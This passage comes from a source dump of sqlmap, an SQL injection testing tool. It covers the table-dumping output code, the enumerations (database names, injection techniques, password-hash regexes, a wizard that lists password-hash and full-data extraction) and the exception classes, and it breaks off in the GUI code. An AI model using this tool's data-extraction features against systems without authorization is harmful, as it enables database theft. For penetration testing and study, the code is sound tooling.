newline=False, console=console)\n\n                    if len(value) > MIN_BINARY_DISK_DUMP_SIZE and r'\\x' in value:\n                        try:\n                            mimetype = getText(magic.from_buffer(value, mime=True))\n                            if any(mimetype.startswith(_) for _ in (\"application\", \"image\")):\n                                if not os.path.isdir(dumpDbPath):\n                                    os.makedirs(dumpDbPath)\n\n                                _ = re.sub(r\"[^\\w]\", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(column)))\n                                filepath = os.path.join(dumpDbPath, \"%s-%d.bin\" % (_, randomInt(8)))\n                                warnMsg = \"writing binary ('%s') content to file '%s' \" % (mimetype, filepath)\n                                logger.warning(warnMsg)\n\n                                with openFile(filepath, \"w+b\", None) as f:\n                                    _ = safechardecode(value, True)\n                                    f.write(_)\n\n                        except Exception as ex:\n                            logger.debug(getSafeExString(ex))\n\n                    if conf.dumpFormat == DUMP_FORMAT.CSV:\n                        if field == fields:\n                            dataToDumpFile(dumpFP, \"%s\" % safeCSValue(value))\n                        else:\n                            dataToDumpFile(dumpFP, \"%s%s\" % (safeCSValue(value), conf.csvDel))\n                    elif conf.dumpFormat == DUMP_FORMAT.HTML:\n                        dataToDumpFile(dumpFP, \"<td>%s</td>\" % getUnicode(htmlEscape(value).encode(\"ascii\", \"xmlcharrefreplace\")))\n\n                    field += 1\n\n            if conf.dumpFormat == DUMP_FORMAT.SQLITE:\n                try:\n                    rtable.insert(values)\n                except SqlmapValueException:\n                    pass\n            elif conf.dumpFormat == DUMP_FORMAT.CSV:\n                dataToDumpFile(dumpFP, \"\\n\")\n            elif conf.dumpFormat == DUMP_FORMAT.HTML:\n                dataToDumpFile(dumpFP, \"</tr>\\n\")\n\n            self._write(\"|\", console=console)\n\n        self._write(\"%s\\n\" % separator)\n\n        if conf.dumpFormat == DUMP_FORMAT.SQLITE:\n            rtable.endTransaction()\n            logger.info(\"table '%s.%s' dumped to SQLITE database '%s'\" % (db, table, replication.dbpath))\n\n        elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):\n            if conf.dumpFormat == DUMP_FORMAT.HTML:\n                dataToDumpFile(dumpFP, \"</tbody>\\n</table>\\n</body>\\n</html>\")\n            else:\n                dataToDumpFile(dumpFP, \"\\n\")\n            dumpFP.close()\n\n            msg = \"table '%s.%s' dumped to %s file '%s'\" % (db, table, conf.dumpFormat, dumpFileName)\n            if not warnFile:\n                logger.info(msg)\n            else:\n                logger.warning(msg)\n\n    def dbColumns(self, dbColumnsDict, colConsider, dbs):\n        if conf.api:\n            self._write(dbColumnsDict, content_type=CONTENT_TYPE.COLUMNS)\n\n        for column in dbColumnsDict.keys():\n            if colConsider == \"1\":\n                colConsiderStr = \"s LIKE '%s' were\" % unsafeSQLIdentificatorNaming(column)\n            else:\n                colConsiderStr = \" '%s' was\" % unsafeSQLIdentificatorNaming(column)\n\n            found = {}\n            for db, tblData in dbs.items():\n                for tbl, colData in tblData.items():\n                    for col, dataType in colData.items():\n                        if column.lower() in col.lower():\n                            if db in found:\n                                if tbl in found[db]:\n                                    found[db][tbl][col] = dataType\n                                else:\n                                    found[db][tbl] = {col: dataType}\n                            else:\n                                found[db] = {}\n                                found[db][tbl] = {col: dataType}\n\n                            continue\n\n            if found:\n                msg = \"column%s found in the \" % colConsiderStr\n                msg += \"following databases:\"\n                self._write(msg)\n\n                self.dbTableColumns(found)\n\n    def sqlQuery(self, query, queryRes):\n        self.string(query, queryRes, content_type=CONTENT_TYPE.SQL_QUERY)\n\n    def rFile(self, fileData):\n        self.lister(\"files saved to\", fileData, sort=False, content_type=CONTENT_TYPE.FILE_READ)\n\n    def registerValue(self, registerData):\n        self.string(\"Registry key value data\", registerData, content_type=CONTENT_TYPE.REG_READ, sort=False)\n\n# object to manage how to print the retrieved queries output to\n# standard output and sessions file\ndumper = Dump()\n"
  },
  {
    "path": "sqlmap/lib/core/enums.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nclass PRIORITY(object):\n    LOWEST = -100\n    LOWER = -50\n    LOW = -10\n    NORMAL = 0\n    HIGH = 10\n    HIGHER = 50\n    HIGHEST = 100\n\nclass SORT_ORDER(object):\n    FIRST = 0\n    SECOND = 1\n    THIRD = 2\n    FOURTH = 3\n    FIFTH = 4\n    LAST = 100\n\n# Reference: https://docs.python.org/2/library/logging.html#logging-levels\nclass LOGGING_LEVELS(object):\n    NOTSET = 0\n    DEBUG = 10\n    INFO = 20\n    WARNING = 30\n    ERROR = 40\n    CRITICAL = 50\n\nclass DBMS(object):\n    ACCESS = \"Microsoft Access\"\n    DB2 = \"IBM DB2\"\n    FIREBIRD = \"Firebird\"\n    MAXDB = \"SAP MaxDB\"\n    MSSQL = \"Microsoft SQL Server\"\n    MYSQL = \"MySQL\"\n    ORACLE = \"Oracle\"\n    PGSQL = \"PostgreSQL\"\n    SQLITE = \"SQLite\"\n    SYBASE = \"Sybase\"\n    INFORMIX = \"Informix\"\n    HSQLDB = \"HSQLDB\"\n    H2 = \"H2\"\n    MONETDB = \"MonetDB\"\n    DERBY = \"Apache Derby\"\n    VERTICA = \"Vertica\"\n    MCKOI = \"Mckoi\"\n    PRESTO = \"Presto\"\n    ALTIBASE = \"Altibase\"\n    MIMERSQL = \"MimerSQL\"\n    CRATEDB = \"CrateDB\"\n    CUBRID = \"Cubrid\"\n    CACHE = \"InterSystems Cache\"\n    EXTREMEDB = \"eXtremeDB\"\n    FRONTBASE = \"FrontBase\"\n    RAIMA = \"Raima Database Manager\"\n    VIRTUOSO = \"Virtuoso\"\n\nclass DBMS_DIRECTORY_NAME(object):\n    ACCESS = \"access\"\n    DB2 = \"db2\"\n    FIREBIRD = \"firebird\"\n    MAXDB = \"maxdb\"\n    MSSQL = \"mssqlserver\"\n    MYSQL = \"mysql\"\n    ORACLE = \"oracle\"\n    PGSQL = \"postgresql\"\n    SQLITE = \"sqlite\"\n    SYBASE = \"sybase\"\n    HSQLDB = \"hsqldb\"\n    H2 = \"h2\"\n    INFORMIX = \"informix\"\n    MONETDB = \"monetdb\"\n    DERBY = \"derby\"\n    VERTICA = \"vertica\"\n    MCKOI = \"mckoi\"\n    PRESTO = \"presto\"\n    ALTIBASE = \"altibase\"\n    MIMERSQL = \"mimersql\"\n    CRATEDB = \"cratedb\"\n    CUBRID = \"cubrid\"\n    CACHE = \"cache\"\n    EXTREMEDB = \"extremedb\"\n    FRONTBASE = \"frontbase\"\n    RAIMA = \"raima\"\n    VIRTUOSO = \"virtuoso\"\n\nclass FORK(object):\n    MARIADB = \"MariaDB\"\n    MEMSQL = \"MemSQL\"\n    PERCONA = \"Percona\"\n    COCKROACHDB = \"CockroachDB\"\n    TIDB = \"TiDB\"\n    REDSHIFT = \"Amazon Redshift\"\n    GREENPLUM = \"Greenplum\"\n    DRIZZLE = \"Drizzle\"\n    IGNITE = \"Apache Ignite\"\n    AURORA = \"Aurora\"\n    ENTERPRISEDB = \"EnterpriseDB\"\n    YELLOWBRICK = \"Yellowbrick\"\n    IRIS = \"Iris\"\n    YUGABYTEDB = \"YugabyteDB\"\n\nclass CUSTOM_LOGGING(object):\n    PAYLOAD = 9\n    TRAFFIC_OUT = 8\n    TRAFFIC_IN = 7\n\nclass OS(object):\n    LINUX = \"Linux\"\n    WINDOWS = \"Windows\"\n\nclass PLACE(object):\n    GET = \"GET\"\n    POST = \"POST\"\n    URI = \"URI\"\n    COOKIE = \"Cookie\"\n    USER_AGENT = \"User-Agent\"\n    REFERER = \"Referer\"\n    HOST = \"Host\"\n    CUSTOM_POST = \"(custom) POST\"\n    CUSTOM_HEADER = \"(custom) HEADER\"\n\nclass POST_HINT(object):\n    SOAP = \"SOAP\"\n    JSON = \"JSON\"\n    JSON_LIKE = \"JSON-like\"\n    MULTIPART = \"MULTIPART\"\n    XML = \"XML (generic)\"\n    ARRAY_LIKE = \"Array-like\"\n\nclass HTTPMETHOD(object):\n    GET = \"GET\"\n    POST = \"POST\"\n    HEAD = \"HEAD\"\n    PUT = \"PUT\"\n    DELETE = \"DELETE\"\n    TRACE = \"TRACE\"\n    OPTIONS = \"OPTIONS\"\n    CONNECT = \"CONNECT\"\n    PATCH = \"PATCH\"\n\nclass NULLCONNECTION(object):\n    HEAD = \"HEAD\"\n    RANGE = \"Range\"\n    SKIP_READ = \"skip-read\"\n\nclass REFLECTIVE_COUNTER(object):\n    MISS = \"MISS\"\n    HIT = \"HIT\"\n\nclass CHARSET_TYPE(object):\n    BINARY = 1\n    DIGITS = 2\n    HEXADECIMAL = 3\n    ALPHA = 4\n    ALPHANUM = 5\n\nclass HEURISTIC_TEST(object):\n    CASTED = 1\n    NEGATIVE = 2\n    POSITIVE = 3\n\nclass HASH(object):\n    MYSQL = r'(?i)\\A\\*[0-9a-f]{40}\\Z'\n    MYSQL_OLD = r'(?i)\\A(?![0-9]+\\Z)[0-9a-f]{16}\\Z'\n    POSTGRES = r'(?i)\\Amd5[0-9a-f]{32}\\Z'\n    MSSQL = r'(?i)\\A0x0100[0-9a-f]{8}[0-9a-f]{40}\\Z'\n    MSSQL_OLD = r'(?i)\\A0x0100[0-9a-f]{8}[0-9a-f]{80}\\Z'\n    MSSQL_NEW = r'(?i)\\A0x0200[0-9a-f]{8}[0-9a-f]{128}\\Z'\n    ORACLE = r'(?i)\\As:[0-9a-f]{60}\\Z'\n    ORACLE_OLD = r'(?i)\\A[0-9a-f]{16}\\Z'\n    MD5_GENERIC = r'(?i)\\A(0x)?[0-9a-f]{32}\\Z'\n    SHA1_GENERIC = r'(?i)\\A(0x)?[0-9a-f]{40}\\Z'\n    SHA224_GENERIC = r'(?i)\\A[0-9a-f]{56}\\Z'\n    SHA256_GENERIC = r'(?i)\\A(0x)?[0-9a-f]{64}\\Z'\n    SHA384_GENERIC = r'(?i)\\A[0-9a-f]{96}\\Z'\n    SHA512_GENERIC = r'(?i)\\A(0x)?[0-9a-f]{128}\\Z'\n    CRYPT_GENERIC = r'\\A(?!\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\Z)(?![0-9]+\\Z)[./0-9A-Za-z]{13}\\Z'\n    JOOMLA = r'\\A[0-9a-f]{32}:\\w{32}\\Z'\n    PHPASS = r'\\A\\$[PHQS]\\$[./0-9a-zA-Z]{31}\\Z'\n    APACHE_MD5_CRYPT = r'\\A\\$apr1\\$.{1,8}\\$[./a-zA-Z0-9]+\\Z'\n    UNIX_MD5_CRYPT = r'\\A\\$1\\$.{1,8}\\$[./a-zA-Z0-9]+\\Z'\n    APACHE_SHA1 = r'\\A\\{SHA\\}[a-zA-Z0-9+/]+={0,2}\\Z'\n    VBULLETIN = r'\\A[0-9a-fA-F]{32}:.{30}\\Z'\n    VBULLETIN_OLD = r'\\A[0-9a-fA-F]{32}:.{3}\\Z'\n    SSHA = r'\\A\\{SSHA\\}[a-zA-Z0-9+/]+={0,2}\\Z'\n    SSHA256 = r'\\A\\{SSHA256\\}[a-zA-Z0-9+/]+={0,2}\\Z'\n    SSHA512 = r'\\A\\{SSHA512\\}[a-zA-Z0-9+/]+={0,2}\\Z'\n    DJANGO_MD5 = r'\\Amd5\\$[^$]+\\$[0-9a-f]{32}\\Z'\n    DJANGO_SHA1 = r'\\Asha1\\$[^$]+\\$[0-9a-f]{40}\\Z'\n    MD5_BASE64 = r'\\A[a-zA-Z0-9+/]{22}==\\Z'\n    SHA1_BASE64 = r'\\A[a-zA-Z0-9+/]{27}=\\Z'\n    SHA256_BASE64 = r'\\A[a-zA-Z0-9+/]{43}=\\Z'\n    SHA512_BASE64 = r'\\A[a-zA-Z0-9+/]{86}==\\Z'\n\n# Reference: http://www.zytrax.com/tech/web/mobile_ids.html\nclass MOBILES(object):\n    BLACKBERRY = (\"BlackBerry Z10\", \"Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.3.2205 Mobile Safari/537.35+\")\n    GALAXY = (\"Samsung Galaxy S8\", \"Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW; en-us) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36 Puffin/9.0.0.50263AP\")\n    HP = (\"HP iPAQ 6365\", \"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; HP iPAQ h6300)\")\n    HTC = (\"HTC 10\", \"Mozilla/5.0 (Linux; Android 8.0.0; HTC 10 Build/OPR1.170623.027) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36\")\n    HUAWEI = (\"Huawei P8\", \"Mozilla/5.0 (Linux; Android 4.4.4; HUAWEI H891L Build/HuaweiH891L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36\")\n    IPHONE = (\"Apple iPhone 8\", \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\")\n    LUMIA = (\"Microsoft Lumia 950\", \"Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 950) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Mobile Safari/537.36 Edge/15.15063\")\n    NEXUS = (\"Google Nexus 7\", \"Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19\")\n    NOKIA = (\"Nokia N97\", \"Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344\")\n    PIXEL = (\"Google Pixel\", \"Mozilla/5.0 (Linux; Android 10; Pixel) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.117 Mobile Safari/537.36\")\n    XIAOMI = (\"Xiaomi Mi 8 Pro\", \"Mozilla/5.0 (Linux; Android 9; MI 8 Pro Build/PKQ1.180729.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/87.0.4280.66 Mobile Safari/537.36\")\n\nclass PROXY_TYPE(object):\n    HTTP = \"HTTP\"\n    HTTPS = \"HTTPS\"\n    SOCKS4 = \"SOCKS4\"\n    SOCKS5 = \"SOCKS5\"\n\nclass REGISTRY_OPERATION(object):\n    READ = \"read\"\n    ADD = \"add\"\n    DELETE = \"delete\"\n\nclass DUMP_FORMAT(object):\n    CSV = \"CSV\"\n    HTML = \"HTML\"\n    SQLITE = \"SQLITE\"\n\nclass HTTP_HEADER(object):\n    ACCEPT = \"Accept\"\n    ACCEPT_CHARSET = \"Accept-Charset\"\n    ACCEPT_ENCODING = \"Accept-Encoding\"\n    ACCEPT_LANGUAGE = \"Accept-Language\"\n    AUTHORIZATION = \"Authorization\"\n    CACHE_CONTROL = \"Cache-Control\"\n    CONNECTION = \"Connection\"\n    CONTENT_ENCODING = \"Content-Encoding\"\n    CONTENT_LENGTH = \"Content-Length\"\n    CONTENT_RANGE = \"Content-Range\"\n    CONTENT_TYPE = \"Content-Type\"\n    COOKIE = \"Cookie\"\n    EXPIRES = \"Expires\"\n    HOST = \"Host\"\n    IF_MODIFIED_SINCE = \"If-Modified-Since\"\n    IF_NONE_MATCH = \"If-None-Match\"\n    LAST_MODIFIED = \"Last-Modified\"\n    LOCATION = \"Location\"\n    PRAGMA = \"Pragma\"\n    PROXY_AUTHORIZATION = \"Proxy-Authorization\"\n    PROXY_CONNECTION = \"Proxy-Connection\"\n    RANGE = \"Range\"\n    REFERER = \"Referer\"\n    REFRESH = \"Refresh\"  # Reference: http://stackoverflow.com/a/283794\n    SERVER = \"Server\"\n    SET_COOKIE = \"Set-Cookie\"\n    TRANSFER_ENCODING = \"Transfer-Encoding\"\n    URI = \"URI\"\n    USER_AGENT = \"User-Agent\"\n    VIA = \"Via\"\n    X_POWERED_BY = \"X-Powered-By\"\n    X_DATA_ORIGIN = \"X-Data-Origin\"\n\nclass EXPECTED(object):\n    BOOL = \"bool\"\n    INT = \"int\"\n\nclass OPTION_TYPE(object):\n    BOOLEAN = \"boolean\"\n    INTEGER = \"integer\"\n    FLOAT = \"float\"\n    STRING = \"string\"\n\nclass HASHDB_KEYS(object):\n    DBMS = \"DBMS\"\n    DBMS_FORK = \"DBMS_FORK\"\n    CHECK_WAF_RESULT = \"CHECK_WAF_RESULT\"\n    CHECK_NULL_CONNECTION_RESULT = \"CHECK_NULL_CONNECTION_RESULT\"\n    CONF_TMP_PATH = \"CONF_TMP_PATH\"\n    KB_ABS_FILE_PATHS = \"KB_ABS_FILE_PATHS\"\n    KB_BRUTE_COLUMNS = \"KB_BRUTE_COLUMNS\"\n    KB_BRUTE_TABLES = \"KB_BRUTE_TABLES\"\n    KB_CHARS = \"KB_CHARS\"\n    KB_DYNAMIC_MARKINGS = \"KB_DYNAMIC_MARKINGS\"\n    KB_INJECTIONS = \"KB_INJECTIONS\"\n    KB_ERROR_CHUNK_LENGTH = \"KB_ERROR_CHUNK_LENGTH\"\n    KB_XP_CMDSHELL_AVAILABLE = \"KB_XP_CMDSHELL_AVAILABLE\"\n    OS = \"OS\"\n\nclass REDIRECTION(object):\n    YES = 'Y'\n    NO = 'N'\n\nclass PAYLOAD(object):\n    SQLINJECTION = {\n        1: \"boolean-based blind\",\n        2: \"error-based\",\n        3: \"inline query\",\n        4: \"stacked queries\",\n        5: \"time-based blind\",\n        6: \"UNION query\",\n    }\n\n    PARAMETER = {\n        1: \"Unescaped numeric\",\n        2: \"Single quoted string\",\n        3: \"LIKE single quoted string\",\n        4: \"Double quoted string\",\n        5: \"LIKE double quoted string\",\n        6: \"Identifier (e.g. column name)\",\n    }\n\n    RISK = {\n        0: \"No risk\",\n        1: \"Low risk\",\n        2: \"Medium risk\",\n        3: \"High risk\",\n    }\n\n    CLAUSE = {\n        0: \"Always\",\n        1: \"WHERE\",\n        2: \"GROUP BY\",\n        3: \"ORDER BY\",\n        4: \"LIMIT\",\n        5: \"OFFSET\",\n        6: \"TOP\",\n        7: \"Table name\",\n        8: \"Column name\",\n        9: \"Pre-WHERE (non-query)\",\n    }\n\n    class METHOD(object):\n        COMPARISON = \"comparison\"\n        GREP = \"grep\"\n        TIME = \"time\"\n        UNION = \"union\"\n\n    class TECHNIQUE(object):\n        BOOLEAN = 1\n        ERROR = 2\n        QUERY = 3\n        STACKED = 4\n        TIME = 5\n        UNION = 6\n\n    class WHERE(object):\n        ORIGINAL = 1\n        NEGATIVE = 2\n        REPLACE = 3\n\nclass WIZARD(object):\n    BASIC = (\"getBanner\", \"getCurrentUser\", \"getCurrentDb\", \"isDba\")\n    INTERMEDIATE = (\"getBanner\", \"getCurrentUser\", \"getCurrentDb\", \"isDba\", \"getUsers\", \"getDbs\", \"getTables\", \"getSchema\", \"excludeSysDbs\")\n    ALL = (\"getBanner\", \"getCurrentUser\", \"getCurrentDb\", \"isDba\", \"getHostname\", \"getUsers\", \"getPasswordHashes\", \"getPrivileges\", \"getRoles\", \"dumpAll\")\n\nclass ADJUST_TIME_DELAY(object):\n    DISABLE = -1\n    NO = 0\n    YES = 1\n\nclass WEB_PLATFORM(object):\n    PHP = \"php\"\n    ASP = \"asp\"\n    ASPX = \"aspx\"\n    JSP = \"jsp\"\n\nclass CONTENT_TYPE(object):\n    TARGET = 0\n    TECHNIQUES = 1\n    DBMS_FINGERPRINT = 2\n    BANNER = 3\n    CURRENT_USER = 4\n    CURRENT_DB = 5\n    HOSTNAME = 6\n    IS_DBA = 7\n    USERS = 8\n    PASSWORDS = 9\n    PRIVILEGES = 10\n    ROLES = 11\n    DBS = 12\n    TABLES = 13\n    COLUMNS = 14\n    SCHEMA = 15\n    COUNT = 16\n    DUMP_TABLE = 17\n    SEARCH = 18\n    SQL_QUERY = 19\n    COMMON_TABLES = 20\n    COMMON_COLUMNS = 21\n    FILE_READ = 22\n    FILE_WRITE = 23\n    OS_CMD = 24\n    REG_READ = 25\n    STATEMENTS = 26\n\nclass CONTENT_STATUS(object):\n    IN_PROGRESS = 0\n    COMPLETE = 1\n\nclass AUTH_TYPE(object):\n    BASIC = \"basic\"\n    DIGEST = \"digest\"\n    BEARER = \"bearer\"\n    NTLM = \"ntlm\"\n    PKI = \"pki\"\n\nclass AUTOCOMPLETE_TYPE(object):\n    SQL = 0\n    OS = 1\n    SQLMAP = 2\n    API = 3\n\nclass NOTE(object):\n    FALSE_POSITIVE_OR_UNEXPLOITABLE = \"false positive or unexploitable\"\n\nclass MKSTEMP_PREFIX(object):\n    HASHES = \"sqlmaphashes-\"\n    CRAWLER = \"sqlmapcrawler-\"\n    IPC = \"sqlmapipc-\"\n    CONFIG = \"sqlmapconfig-\"\n    TESTING = \"sqlmaptesting-\"\n    RESULTS = \"sqlmapresults-\"\n    COOKIE_JAR = \"sqlmapcookiejar-\"\n    BIG_ARRAY = \"sqlmapbigarray-\"\n    SPECIFIC_RESPONSE = \"sqlmapresponse-\"\n    PREPROCESS = \"sqlmappreprocess-\"\n\nclass TIMEOUT_STATE(object):\n    NORMAL = 0\n    EXCEPTION = 1\n    TIMEOUT = 2\n\nclass HINT(object):\n    PREPEND = 0\n    APPEND = 1\n\nclass FUZZ_UNION_COLUMN:\n    STRING = \"<string>\"\n    INTEGER = \"<integer>\"\n    NULL = \"NULL\"\n\nclass COLOR:\n    BLUE = \"\\033[34m\"\n    BOLD_MAGENTA = \"\\033[35;1m\"\n    BOLD_GREEN = \"\\033[32;1m\"\n    BOLD_LIGHT_MAGENTA = \"\\033[95;1m\"\n    LIGHT_GRAY = \"\\033[37m\"\n    BOLD_RED = \"\\033[31;1m\"\n    BOLD_LIGHT_GRAY = \"\\033[37;1m\"\n    YELLOW = \"\\033[33m\"\n    DARK_GRAY = \"\\033[90m\"\n    BOLD_CYAN = \"\\033[36;1m\"\n    LIGHT_RED = \"\\033[91m\"\n    CYAN = \"\\033[36m\"\n    MAGENTA = \"\\033[35m\"\n    LIGHT_MAGENTA = \"\\033[95m\"\n    LIGHT_GREEN = \"\\033[92m\"\n    RESET = \"\\033[0m\"\n    BOLD_DARK_GRAY = \"\\033[90;1m\"\n    BOLD_LIGHT_YELLOW = \"\\033[93;1m\"\n    BOLD_LIGHT_RED = \"\\033[91;1m\"\n    BOLD_LIGHT_GREEN = \"\\033[92;1m\"\n    LIGHT_YELLOW = \"\\033[93m\"\n    BOLD_LIGHT_BLUE = \"\\033[94;1m\"\n    BOLD_LIGHT_CYAN = \"\\033[96;1m\"\n    LIGHT_BLUE = \"\\033[94m\"\n    BOLD_WHITE = \"\\033[97;1m\"\n    LIGHT_CYAN = \"\\033[96m\"\n    BLACK = \"\\033[30m\"\n    BOLD_YELLOW = \"\\033[33;1m\"\n    BOLD_BLUE = \"\\033[34;1m\"\n    GREEN = \"\\033[32m\"\n    WHITE = \"\\033[97m\"\n    BOLD_BLACK = \"\\033[30;1m\"\n    RED = \"\\033[31m\"\n    UNDERLINE = \"\\033[4m\"\n\nclass BACKGROUND:\n    BLUE = \"\\033[44m\"\n    LIGHT_GRAY = \"\\033[47m\"\n    YELLOW = \"\\033[43m\"\n    DARK_GRAY = \"\\033[100m\"\n    LIGHT_RED = \"\\033[101m\"\n    CYAN = \"\\033[46m\"\n    MAGENTA = \"\\033[45m\"\n    LIGHT_MAGENTA = \"\\033[105m\"\n    LIGHT_GREEN = \"\\033[102m\"\n    RESET = \"\\033[0m\"\n    LIGHT_YELLOW = \"\\033[103m\"\n    LIGHT_BLUE = \"\\033[104m\"\n    LIGHT_CYAN = \"\\033[106m\"\n    BLACK = \"\\033[40m\"\n    GREEN = \"\\033[42m\"\n    WHITE = \"\\033[107m\"\n    RED = \"\\033[41m\"\n"
  },
  {
    "path": "sqlmap/lib/core/exception.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nclass SqlmapBaseException(Exception):\n    pass\n\nclass SqlmapCompressionException(SqlmapBaseException):\n    pass\n\nclass SqlmapConnectionException(SqlmapBaseException):\n    pass\n\nclass SqlmapDataException(SqlmapBaseException):\n    pass\n\nclass SqlmapFilePathException(SqlmapBaseException):\n    pass\n\nclass SqlmapGenericException(SqlmapBaseException):\n    pass\n\nclass SqlmapInstallationException(SqlmapBaseException):\n    pass\n\nclass SqlmapMissingDependence(SqlmapBaseException):\n    pass\n\nclass SqlmapMissingMandatoryOptionException(SqlmapBaseException):\n    pass\n\nclass SqlmapMissingPrivileges(SqlmapBaseException):\n    pass\n\nclass SqlmapNoneDataException(SqlmapBaseException):\n    pass\n\nclass SqlmapNotVulnerableException(SqlmapBaseException):\n    pass\n\nclass SqlmapSilentQuitException(SqlmapBaseException):\n    pass\n\nclass SqlmapUserQuitException(SqlmapBaseException):\n    pass\n\nclass SqlmapShellQuitException(SqlmapBaseException):\n    pass\n\nclass SqlmapSkipTargetException(SqlmapBaseException):\n    pass\n\nclass SqlmapSyntaxException(SqlmapBaseException):\n    pass\n\nclass SqlmapSystemException(SqlmapBaseException):\n    pass\n\nclass SqlmapThreadException(SqlmapBaseException):\n    pass\n\nclass SqlmapTokenException(SqlmapBaseException):\n    pass\n\nclass SqlmapUndefinedMethod(SqlmapBaseException):\n    pass\n\nclass SqlmapUnsupportedDBMSException(SqlmapBaseException):\n    pass\n\nclass SqlmapUnsupportedFeatureException(SqlmapBaseException):\n    pass\n\nclass SqlmapValueException(SqlmapBaseException):\n    pass\n"
  },
  {
    "path": "sqlmap/lib/core/gui.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport re\nimport socket\nimport subprocess\nimport sys\nimport tempfile\nimport threading\nimport webbrowser\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import saveConfig\nfrom lib.core.data import paths\nfrom lib.core.defaults import defaults\nfrom lib.core.enums import MKSTEMP_PREFIX\nfrom lib.core.exception import SqlmapMissingDependence\nfrom lib.core.exception import SqlmapSystemException\nfrom lib.core.settings import DEV_EMAIL_ADDRESS\nfrom lib.core.settings import IS_WIN\nfrom lib.core.settings import ISSUES_PAGE\nfrom lib.core.settings import GIT_PAGE\nfrom lib.core.settings import SITE\nfrom lib.core.settings import VERSION_STRING\nfrom lib.core.settings import WIKI_PAGE\nfrom thirdparty.six.moves import queue as _queue\n\nalive = None\nline = \"\"\nprocess = None\nqueue = None\n\ndef runGui(parser):\n    try:\n        from thirdparty.six.moves import tkinter as _tkinter\n        from thirdparty.six.moves import tkinter_scrolledtext as _tkinter_scrolledtext\n        from thirdparty.six.moves import tkinter_ttk as _tkinter_ttk\n        from thirdparty.six.moves import tkinter_messagebox as _tkinter_messagebox\n    except ImportError as ex:\n        raise SqlmapMissingDependence(\"missing dependence ('%s')\" % getSafeExString(ex))\n\n    # Reference: https://www.reddit.com/r/learnpython/comments/985umy/limit_user_input_to_only_int_with_tkinter/e4dj9k9?utm_source=share&utm_medium=web2x\n    class ConstrainedEntry(_tkinter.Entry):\n        def __init__(self, master=None, **kwargs):\n            self.var = _tkinter.StringVar()\n            self.regex = kwargs[\"regex\"]\n            del kwargs[\"regex\"]\n            _tkinter.Entry.__init__(self, master, textvariable=self.var, **kwargs)\n            self.old_value = ''\n            self.var.trace('w', self.check)\n            self.get, self.set = self.var.get, self.var.set\n\n        def check(self, *args):\n            if re.search(self.regex, self.get()):\n                self.old_value = self.get()\n            else:\n                self.set(self.old_value)\n\n    # Reference: https://code.activestate.com/recipes/580726-tkinter-notebook-that-fits-to-the-height-of-every-/\n    class AutoresizableNotebook(_tkinter_ttk.Notebook):\n        def __init__(self, master=None, **kw):\n            _tkinter_ttk.Notebook.__init__(self, master, **kw)\n            self.bind(\"<<NotebookTabChanged>>\", self._on_tab_changed)\n\n        def _on_tab_changed(self, event):\n            event.widget.update_idletasks()\n\n            tab = event.widget.nametowidget(event.widget.select())\n            event.widget.configure(height=tab.winfo_reqheight())\n\n    try:\n        window = _tkinter.Tk()\n    except Exception as ex:\n        errMsg = \"unable to create GUI window ('%s')\" % getSafeExString(ex)\n        raise SqlmapSystemException(errMsg)\n\n    window.title(VERSION_STRING)\n\n    # Reference: https://www.holadevs.com/pregunta/64750/change-selected-tab-color-in-ttknotebook\n    style = _tkinter_ttk.Style()\n    settings = {\"TNotebook.Tab\": {\"configure\": {\"padding\": [5, 1], \"background\": \"#fdd57e\"}, \"map\": {\"background\": [(\"selected\", \"#C70039\"), (\"active\", \"#fc9292\")], \"foreground\": [(\"selected\", \"#ffffff\"), (\"active\", \"#000000\")]}}}\n    style.theme_create(\"custom\", parent=\"alt\", settings=settings)\n    style.theme_use(\"custom\")\n\n    # Reference: https://stackoverflow.com/a/10018670\n    def center(window):\n        window.update_idletasks()\n        width = window.winfo_width()\n        frm_width = window.winfo_rootx() - window.winfo_x()\n        win_width = width + 2 * frm_width\n        height = window.winfo_height()\n        titlebar_height = window.winfo_rooty() - window.winfo_y()\n        win_height = height + titlebar_height + frm_width\n        x = window.winfo_screenwidth() // 2 - win_width // 2\n        y = window.winfo_screenheight() // 2 - win_height // 2\n        window.geometry('{}x{}+{}+{}'.format(width, height, x, y))\n        window.deiconify()\n\n    def onKeyPress(event):\n        global line\n        global queue\n\n        if process:\n            if event.char == '\\b':\n                line = line[:-1]\n            else:\n                line += event.char\n\n    def onReturnPress(event):\n        global line\n        global 